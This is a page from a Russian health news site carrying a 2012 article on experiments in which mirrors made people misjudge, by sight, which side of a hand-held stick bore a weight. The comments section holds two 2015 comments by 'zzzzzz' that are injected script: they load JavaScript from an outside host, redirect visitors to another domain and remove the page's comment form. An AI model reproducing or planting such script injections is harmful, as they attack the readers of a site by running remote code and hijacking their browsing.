Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мозг – игрушка «в руках» ...  >>  Мозг – игрушка «в руках» глаз
 
Обратная связь
 

Мозг – игрушка «в руках» глаз

Размер шрифта
08 ноября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

В это трудно поверить, но для того чтобы поднести чашку с утренним кофе ко рту, наш мозг принимает большое количество решений, в то время как мы повторяем эту процедуру изо дня в день, не испытывая затруднений.

Мозг – игрушка «в руках» глаз

Игры разума

Когда мы берем в руки какой-то предмет, наш мозг автоматически посылает импульсы к определенным мышцам в зависимости от формы предмета. Информация о форме предмета поступает в мозг с помощью зрения. Когда мы берем кружку правой рукой, мы поворачиваем кисть по часовой стрелке, чтобы создать противовес. Визуальная информация играет такую большую роль, что человек абсолютно не способен контролировать этот процесс.

Суть исследования

Исследование состояло из двух экспериментов. Во время первого эксперимента участники должны были взять вертикальную палку, снабженную утяжелением с правой или с левой стороны. Люди легко определяли, на какой стороне находилось утяжеление, даже при закрытых глазах.

Затем ученые использовали несколько зеркал, чтобы перевернуть изображение. Благодаря такому «обману» участникам казалось, что утяжеление, которое находилось справа, находится слева и наоборот. Даже когда участники брали палку в руки, они все равно ошибались, когда их просили сказать, с какой стороны находится утяжеление, и ориентировались на визуальную информацию.

Во время второго эксперимента участникам подробно объяснили, в чем суть обмана. И все равно они не смогли игнорировать визуальную информацию.

Результаты

Наш мозг постоянно принимает решения, о которых мы не знаем или которые мы не понимаем.  В исследовании мозг автоматически использовал визуальную информацию и навязывал рукам определенные ощущения в соответствии с этой информацией. Изменив визуальную информацию с помощью зеркал, ученые доказали, что человек ориентируется не на истинные ощущения в руках, а на те ощущения, которые диктует мозг при обработке визуальной информации.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Глаза расскажут о состоянии головного мозга   Люди с повышенным внутриглазным давлением чаще разбиваются на машинах   Пять способов борьбы с сухостью глаз   Диагноз «шизофрения» можно поставить по движению глаз  
07 ноября 2012Мозг – игрушка «в руках» глаз 13 марта 2013Куда надо смотреть, чтобы понять, что думает человек
 
18 февраля 2013Люди с повышенным внутриглазным давлением чаще разбиваются на машинах 24 октября 2012Настоящее чудо: слепые смогут снова видеть
 

Слайдшоу

1
Мифы и факты о глазах
Продукты для здоровья глаз
Наглядное руководство по заболеваниям глаз

Тесты

Проверьте свое зрение
Знаете ли вы свой мозг?
Что вы знаете о позвоночнике?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.